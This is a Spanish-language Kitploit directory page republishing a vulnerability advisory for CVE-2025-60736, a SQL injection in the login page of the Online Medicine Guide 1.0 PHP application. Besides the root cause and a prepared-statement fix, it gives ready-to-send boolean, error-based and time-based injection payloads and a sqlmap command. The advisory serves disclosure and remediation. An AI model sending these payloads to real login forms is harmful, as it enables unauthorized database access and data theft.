Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-60736 — code-projects Online Medicine Guide 1.0 es vulnerable a la inyección SQL | Kitploit
Herramientas/GitHubGitHub/nxvh1337/cve-2025-60736
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxvh1337/cve-2025-60736

CVE-2025-60736

code-projects Online Medicine Guide 1.0 es vulnerable a la inyección SQL

Ver Repositorio
1hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-60736: Vulnerabilidad de Inyección SQL en Online Medicine Guide

Resumen Ejecutivo

Este documento describe una vulnerabilidad crítica de inyección SQL descubierta en la aplicación web Online Medicine Guide. La vulnerabilidad permite el acceso no autorizado a la base de datos y plantea riesgos de seguridad significativos para la aplicación y sus usuarios.

Remitente

  • Noah "nxvh" Heraud

1. Información del Producto

Producto Afectado

  • Nombre del Producto: Online Medicine Guide
  • Vendedor: Code Projects
  • Página del Vendedor: https://code-projects.org/online-medicine-guide-in-php-css-javascript-and-mysql-free-download/
  • Versión Afectada: v1.0
  • Archivo Vulnerable: /login.php
  • : Aplicación Web (PHP/MySQL)
Tipo de Software

Detalles Técnicos

  • Lenguaje de Programación: PHP
  • Base de Datos: MySQL
  • Frontend: CSS, JavaScript
  • Arquitectura: Pila LAMP/WAMP

2. Detalles de la Vulnerabilidad

Clasificación de la Vulnerabilidad

  • ID CVE: CVE-2025-60736
  • Tipo de Vulnerabilidad: Inyección SQL
  • Severidad: Crítica
  • Puntuación CVSS: 9.8 (Crítica)
  • Vector de Ataque: Red
  • Complejidad del Ataque: Baja
  • Privilegios Requeridos: Ninguno
  • Interacción del Usuario: Ninguna
  • Alcance: Cambiado

Análisis de Causa Raíz

La vulnerabilidad se origina por una validación y saneamiento insuficientes de las entradas en el archivo /login.php. La aplicación concatena directamente la entrada del usuario del parámetro upass en las consultas SQL sin un saneamiento adecuado ni sentencias preparadas.

Causa Raíz Técnica:

  • Concatenación directa de cadenas en consultas SQL
  • Falta de validación y saneamiento de entradas
  • Ausencia de implementación de sentencias preparadas
  • Enlace de parámetros insuficiente

3. Prueba de Concepto

Ubicación de la Vulnerabilidad

  • Archivo: /login.php
  • Parámetro: upass (POST)
  • Vector de Ataque: Manipulación de solicitudes HTTP POST

Métodos de Explotación

Método 1: Inyección SQL Basada en Booleanos

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx

Método 1: Inyección SQL Basada en Errores

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp

Método 2: Inyección SQL Ciega Basada en Tiempo

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa

Pruebas Automatizadas

La vulnerabilidad fue confirmada usando sqlmap:

root@kitploit:~
sqlmap -u "http://localhost:8000/login.php" --data="uname=admin&upass=test" -p upass --batch --dbs

prueba de explotación

4. Plan de Remediación

Acciones Inmediatas

  1. Parche de Emergencia: Implementar validación de entradas para el parámetro upass
  2. Monitoreo de Base de Datos: Habilitar registro integral de actividades sospechosas
  3. Restricción de Acceso: Implementar limitación de velocidad y restricciones basadas en IP
  4. Auditoría de Seguridad: Realizar una evaluación de seguridad inmediata

5. Remediación Técnica

Ejemplo de Corrección de Código

Antes (Vulnerable):

root@kitploit:~
$query = "SELECT * FROM users WHERE username = '" . $_POST['uname'] . "'";

Después (Seguro):

root@kitploit:~
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$_POST['uname']]);

Implementación de Buenas Prácticas de Seguridad

  1. Sentencias Preparadas: Usar consultas parametrizadas exclusivamente
  2. Validación de Entradas: Implementar validación basada en listas blancas
  3. Codificación de Salidas: Codificar adecuadamente todos los datos de salida
  4. Manejo de Errores: Implementar manejo seguro de errores sin divulgación de información
  5. Controles de Acceso: Implementar autenticación y autorización adecuadas

Versión del Documento: 1.0
Última Actualización: 03/10/2025 (dd/mm/aaaa)

Descargar herramienta